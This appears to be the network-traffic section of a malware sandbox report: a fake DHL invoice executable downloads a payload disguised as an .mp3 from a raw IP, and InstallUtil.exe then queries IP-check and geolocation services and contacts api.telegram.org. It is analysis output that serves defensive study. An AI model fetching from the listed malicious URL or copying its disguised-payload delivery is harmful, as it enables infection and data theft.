                                                                                                              Dec 20, 2024 10:23:00.185403109 CET49753443192.168.2.4104.21.67.152
                                                                                                              Dec 20, 2024 10:23:00.185424089 CET44349753104.21.67.152192.168.2.4
                                                                                                              Dec 20, 2024 10:23:00.232883930 CET4975180192.168.2.4132.226.247.73
                                                                                                              Dec 20, 2024 10:23:01.401572943 CET44349753104.21.67.152192.168.2.4
                                                                                                              Dec 20, 2024 10:23:01.403304100 CET49753443192.168.2.4104.21.67.152
                                                                                                              Dec 20, 2024 10:23:01.403341055 CET44349753104.21.67.152192.168.2.4
                                                                                                              Dec 20, 2024 10:23:01.872252941 CET44349753104.21.67.152192.168.2.4
                                                                                                              Dec 20, 2024 10:23:01.872423887 CET44349753104.21.67.152192.168.2.4
                                                                                                              Dec 20, 2024 10:23:01.872472048 CET49753443192.168.2.4104.21.67.152
                                                                                                              Dec 20, 2024 10:23:01.872992039 CET49753443192.168.2.4104.21.67.152
                                                                                                              Dec 20, 2024 10:23:07.011641979 CET4975180192.168.2.4132.226.247.73
                                                                                                              Dec 20, 2024 10:23:07.136490107 CET8049751132.226.247.73192.168.2.4
                                                                                                              Dec 20, 2024 10:23:07.136689901 CET4975180192.168.2.4132.226.247.73
                                                                                                              Dec 20, 2024 10:23:07.166456938 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:07.166541100 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:07.166625023 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:07.167325020 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:07.167351007 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:08.545980930 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:08.546082020 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:08.547827005 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:08.547852993 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:08.548254013 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:08.549544096 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:08.591358900 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:08.592984915 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:08.593002081 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:09.381251097 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:09.381347895 CET44349769149.154.167.220192.168.2.4
                                                                                                              Dec 20, 2024 10:23:09.381397963 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:09.381836891 CET49769443192.168.2.4149.154.167.220
                                                                                                              Dec 20, 2024 10:23:49.223036051 CET8049740132.226.247.73192.168.2.4
                                                                                                              Dec 20, 2024 10:23:49.223114014 CET4974080192.168.2.4132.226.247.73
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 20, 2024 10:22:36.788990974 CET6099553192.168.2.41.1.1.1
                                                                                                              Dec 20, 2024 10:22:36.926882982 CET53609951.1.1.1192.168.2.4
                                                                                                              Dec 20, 2024 10:22:38.827910900 CET5093453192.168.2.41.1.1.1
                                                                                                              Dec 20, 2024 10:22:38.976162910 CET53509341.1.1.1192.168.2.4
                                                                                                              Dec 20, 2024 10:23:07.012360096 CET5914153192.168.2.41.1.1.1
                                                                                                              Dec 20, 2024 10:23:07.165433884 CET53591411.1.1.1192.168.2.4
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 20, 2024 10:22:36.788990974 CET192.168.2.41.1.1.10x1bd3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:38.827910900 CET192.168.2.41.1.1.10xf40eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:23:07.012360096 CET192.168.2.41.1.1.10xa43cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 20, 2024 10:22:36.926882982 CET1.1.1.1192.168.2.40x1bd3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:36.926882982 CET1.1.1.1192.168.2.40x1bd3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:36.926882982 CET1.1.1.1192.168.2.40x1bd3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:36.926882982 CET1.1.1.1192.168.2.40x1bd3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:36.926882982 CET1.1.1.1192.168.2.40x1bd3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:36.926882982 CET1.1.1.1192.168.2.40x1bd3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:38.976162910 CET1.1.1.1192.168.2.40xf40eNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:22:38.976162910 CET1.1.1.1192.168.2.40xf40eNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 10:23:07.165433884 CET1.1.1.1192.168.2.40xa43cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              • reallyfreegeoip.org
                                                                                                              • api.telegram.org
                                                                                                              • 160.22.121.182
                                                                                                              • checkip.dyndns.org
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.449730160.22.121.182806672C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:01.595963955 CET83OUTGET /STATO/Vskhdvzxu.mp3 HTTP/1.1
                                                                                                              Host: 160.22.121.182
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 20, 2024 10:22:03.186876059 CET1236INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:02 GMT
                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                              Last-Modified: Fri, 20 Dec 2024 01:44:41 GMT
                                                                                                              ETag: "ea408-629a9ca58f463"
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 959496
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: audio/mpeg
                                                                                                              Data Raw: 39 8f 3e 13 e8 86 6c d1 8e 07 c9 dd 28 79 e0 27 58 e1 86 5a c3 23 08 9a f2 33 f9 11 c0 12 af 8d 4c b3 e1 f0 fc b9 13 e6 fe 17 8d c7 75 bf 63 2e d3 0e 83 81 fc ee bf 50 4b d9 c3 47 bd c0 69 56 2c e7 cf 07 5e 57 24 98 58 53 ba cc 77 43 dd 2e 47 4e bb 35 58 a4 6e 62 51 d5 42 55 a8 b6 bf 7d c2 c0 78 1d 75 73 0b 3b d5 06 bf ef 75 73 c9 b5 2e 00 b5 f7 45 bc 78 67 df 60 80 64 5d b1 b9 13 5f a8 4c f6 71 9e 29 82 7b 1f 35 e0 82 5f f7 97 27 97 33 c0 11 c8 50 c0 75 3d e4 a1 2c 4b bb bf 75 3f 38 6a f2 cf 5c a7 32 f4 9d 96 74 9e 4e db 84 ff 57 11 2f fc 3b 5f 1d 89 6a d7 4e b3 3a 19 30 f7 3f c7 2e b8 7b b2 41 83 a6 36 6f 32 49 94 ed 6d fe 10 3e a0 c8 47 6c a0 13 a4 02 a7 33 f5 05 e6 d0 20 e1 09 cf b9 b6 a5 91 bf 18 05 2e 69 54 22 ef 07 0f 1c c9 e0 a9 f3 e9 2a 66 ee 0f 97 aa 5b 4a 3f 5c e2 d8 38 bf ec 97 96 d4 1f b1 33 1b f5 5b 01 39 a5 02 00 8d 7b 5d d2 de 36 fe 91 9a d5 d0 64 16 a5 5e b3 6e 30 6a 4b d2 37 4e a6 0c 40 88 9d df a9 61 8d 2c 88 11 91 f5 d5 b2 1a 44 ad 56 7e fa 77 54 99 3b c4 83 e0 21 f7 44 9d ad 56 [TRUNCATED]
                                                                                                              Data Ascii: 9>l(y'XZ#3Luc.PKGiV,^W$XSwC.GN5XnbQBU}xus;us.Exg`d]_Lq){5_'3Pu=,Ku?8j\2tNW/;_jN:0?.{A6o2Im>Gl3 .iT"*f[J?\83[9{]6d^n0jK7N@a,DV~wT;!DV!}i<19cBk?KuED,tE&_JB{iM:7W1hi@qtQ+]Z=|RRwUgKD(EhD3-ffAT!"4(?4,kR1BMSOmO|8V}V_^$I^tVyi')`'-7a"#VU8:cr{S;Ntp)\{W\vD](-A)]dtM3h7qH[2HV|"I,<.FCK74`)V#k8F|JT'}9L@D.kJo)HHZ5pl#)PCBLd${]3WM(!5OK)~=43%`_9sM7%(s,h'97(&Vw].hdSuT7*NOH} p2~>
                                                                                                              Dec 20, 2024 10:22:03.186894894 CET1236INData Raw: 6d ee 09 55 2a b3 84 6e 96 36 7a 81 ba 0a 05 10 76 b9 ec 9d 5b 26 ef 98 d9 cd 20 ac f1 89 7a 1a d3 90 da 97 88 93 58 0c 53 25 d0 75 d3 33 ec 64 b2 6d 65 e9 f1 2a 0d 78 b1 8b c0 93 56 96 1d 04 6f 4a 70 a7 8c e2 30 63 02 fe 7b 73 97 df 52 7b 50 84
                                                                                                              Data Ascii: mU*n6zv[& zXS%u3dme*xVoJp0c{sR{P-8bO'`HA#]xKLzaoPGwnMl>Czmn7=d,gu0gbdN}9VhIicRy#+V"gBGkTTE|F?,hiYG
                                                                                                              Dec 20, 2024 10:22:03.186903954 CET1236INData Raw: bd 7f b0 0b 92 f0 8c b4 a4 4c 48 2e 80 3a 42 95 1a b6 0f f5 6f 8d 89 dd 52 2c f1 f7 80 7e c3 04 97 88 5a aa 63 8b 2f 92 42 16 24 ab c1 2d d6 4f 29 8a bc d6 8d fb 27 25 6e 04 97 7f 22 ce 71 2a 79 36 a3 cb db b0 4a 24 0a ed 36 3f c4 cd 75 82 e5 0a
                                                                                                              Data Ascii: LH.:BoR,~Zc/B$-O)'%n"q*y6J$6?u(up&v{C*H*Gt#g1uQm>SXkTf'(e1/I+4?IO6w5?b.7:jR8-v4i=VFRPFy'O_
                                                                                                              Dec 20, 2024 10:22:03.187035084 CET1236INData Raw: 77 4d e7 a7 2b 25 89 4d f5 5a c1 c5 03 11 55 8f c9 2d 0e 22 32 f6 f9 5e 7c 1e b6 52 a5 53 65 ab 5e f4 a6 19 46 5d 66 8d de 23 24 18 71 be b1 18 ef dd 83 bd a5 5c 21 5d 41 1f 36 8a 2e 5a 83 69 7b b2 96 eb ef f7 a8 c3 cd da 15 79 f3 e3 57 9d e9 d5
                                                                                                              Data Ascii: wM+%MZU-"2^|RSe^F]f#$q\!]A6.Zi{yWz))47J:K}]dg7QHpGVRuKhz506x6NddS>@cgA2uXfAMk7hyAC(xFs3WI
                                                                                                              Dec 20, 2024 10:22:03.187047005 CET896INData Raw: 27 a6 58 b0 14 74 78 d8 d5 fb d9 f6 1d 55 5c 41 68 43 84 54 52 31 cd a4 98 7f 4a d9 5c 96 19 f9 4a 95 30 c2 26 dc 5f 18 cd b9 61 39 ca 27 f9 b1 af 32 b2 14 14 50 d9 31 83 65 16 2d 6a 0d df 50 a6 59 ae 25 b7 d3 c3 a4 22 96 1b 99 68 d8 60 41 55 23
                                                                                                              Data Ascii: 'XtxU\AhCTR1J\J0&_a9'2P1e-jPY%"h`AU#C7}#R;4*FiY{hIj|Rq[E+7{Z]|I%N;81tI6m~9dOO*]GT AD"FpV=952)7?Lk'VM%6BK>M
                                                                                                              Dec 20, 2024 10:22:03.439441919 CET1236INData Raw: 72 71 2d 68 1e b5 6c 47 7f 85 d5 7d db 0f 66 14 66 a5 cf bb d9 ef 57 e5 ee 0c 15 a3 38 51 3a fc 0e 1f 43 0c 18 35 2d 81 c1 60 3d ca 39 b3 04 b8 d1 1a 2d b9 d1 74 50 86 6b 4f 87 b4 45 06 d9 88 7d 89 dc 0b 8c a1 2b 05 0b 8f aa d6 01 b7 0f 5b 7a 3a
                                                                                                              Data Ascii: rq-hlG}ffW8Q:C5-`=9-tPkOE}+[z:w!@8P5:_Cej@"`OlXk:qLna}+{S$z+,6%A@I\?mzc+3t"mpZDqWAi%r-
                                                                                                              Dec 20, 2024 10:22:03.439508915 CET1236INData Raw: b3 d3 3e 3a 09 79 e6 62 81 c2 f0 d8 12 bf 76 fd b8 bc 39 86 d1 0d 53 5c 7c 96 2a d4 52 b1 b9 91 87 cb 77 29 e2 44 40 b7 4c 54 4f e6 b3 44 c0 56 6e 01 6e 5e 56 2e 9c b9 d4 d5 68 09 23 c2 ee db 76 05 35 5c f0 d3 60 7b 26 d7 ae 06 42 ef 44 11 47 82
                                                                                                              Data Ascii: >:ybv9S\|*Rw)D@LTODVnn^V.h#v5\`{&BDGcC*J& MWdbVT!5qP-dT-BG&L!p?.40m P]pil?ks4 =G'vG;LXh$]U {5@>C
                                                                                                              Dec 20, 2024 10:22:03.439527035 CET1236INData Raw: 46 f2 02 b8 dd 0e 07 b0 20 b8 55 4d 45 37 ef e4 68 9a 1f b3 60 5a 8d 3a 25 78 0d b3 83 f9 32 9e 47 e9 88 3a c2 3a 57 24 bd 4a 63 f8 2f 01 99 76 b1 ee a6 bd 4d e8 ac 75 d1 fa bd d5 bf 13 12 77 5f af 78 99 90 af b3 ff a0 95 e1 a6 a8 5d ab ed 5b c1
                                                                                                              Data Ascii: F UME7h`Z:%x2G::W$Jc/vMuw_x][m~qqtn`~P9\]/-v)graU0]{BJQ\Zz'6CwaKHIRamuq#Bv}xO )s;`*>nVdDkR[4i
                                                                                                              Dec 20, 2024 10:22:03.439599991 CET1236INData Raw: 6f 09 2f 7a 8b 56 be 1f 6f 55 b1 a6 b6 e1 36 a7 a9 dd a3 c2 3c 8a 6a 7b bb e0 f4 e4 7d 59 db 61 97 e1 a7 d1 1e 72 44 f1 98 6d f6 b3 12 20 10 4d cd b7 b7 bb 0a 00 19 93 5b 02 70 1d 21 f5 3f 2d 8c cc 76 0e 5a b6 3c 7a e5 5b ba 54 b0 8f af 04 c6 1c
                                                                                                              Data Ascii: o/zVoU6<j{}YarDm M[p!?-vZ<z[T*^H/MYE?VSYp8hd4j~7}=%C.71LPf1M~P&B$<)ImK->f1aSLQumdvEw[`t c,#kDSPv4]9H#
                                                                                                              Dec 20, 2024 10:22:03.559010983 CET1236INData Raw: 5c 94 16 90 69 e7 c2 5d dc 37 75 d5 6e b8 f6 fe ed 7e 59 3f 8e 51 d7 4a 4a 70 ba 44 c7 e4 c7 9b a8 e4 a4 6a a7 43 3c d8 0b 83 f2 ee 08 fc 87 01 f3 09 6d 34 ec 03 46 19 60 0d a3 ce 29 de fa ab 67 9d d9 27 88 30 d6 14 fd 0e 95 ee d9 0f e7 f5 b7 2d
                                                                                                              Data Ascii: \i]7un~Y?QJJpDjC<m4F`)g'0-`H.e_HA'lF}.rbt.7(A6550Ac2&;%y7]Y-es:Hz">87* KGk ZNPLY7
                                                                                                              Dec 20, 2024 10:22:03.559022903 CET1236INData Raw: 2a 66 df 7c 3f 32 5d f0 db 08 d5 ce bc ec ae 2b e9 c4 a5 26 a1 51 c0 0f 36 ad e2 9f eb dc 85 43 c2 33 b8 ca c1 d2 58 b9 85 6f 56 db cd 26 07 49 2d ec 39 90 48 df 2b 61 27 eb f9 62 8c 93 6b 1c e6 75 85 18 8a c1 17 7b 3c b7 73 ef 7f 2c 4e 56 96 25
                                                                                                              Data Ascii: *f|?2]+&Q6C3XoV&I-9H+a'bku{<s,NV%+zC}{QgsdTr|C609@!O ;E80v8,bH-$+%{C?R>x34('b^k*&0b_h


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.449737132.226.247.73801432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:37.054039001 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 20, 2024 10:22:38.359555006 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: de49c2acf551fc8e4da8f883e80ea429
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Dec 20, 2024 10:22:38.364152908 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Dec 20, 2024 10:22:38.790900946 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 4ef0b1a99068a5c6769cd343bc07e990
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                              Dec 20, 2024 10:22:40.660377979 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Dec 20, 2024 10:22:41.122796059 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:40 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: bff6ea38cc7e11f9f5c1fd3707bedd0c
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.449740132.226.247.73801432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:42.918978930 CET127OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Dec 20, 2024 10:22:44.222405910 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:44 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: d6a724a5502db5354e497f8fb28152a1
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.449742132.226.247.73801432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:46.403323889 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 20, 2024 10:22:47.707815886 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:47 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: f6d95f93f8e1b397cd7ebc7f39a349b7
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              4192.168.2.449744132.226.247.73801432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:49.499505997 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 20, 2024 10:22:50.804502010 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:50 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: b317188686e4bb98dbea97ab3d28e7b4
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.449746132.226.247.73801432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:52.596546888 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 20, 2024 10:22:53.901072025 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 027b55237ef9f49dcc0bbbbf23e81083
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.449748132.226.247.73801432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:55.768239021 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 20, 2024 10:22:57.092056990 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:56 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 172a43d101a5d077e1f47a529c0a772d
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.449751132.226.247.73801432C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 20, 2024 10:22:58.880534887 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Dec 20, 2024 10:23:00.183773041 CET321INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 09:22:59 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              X-Request-ID: 985c6296e90ad8502cf33babff3ab8ad
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
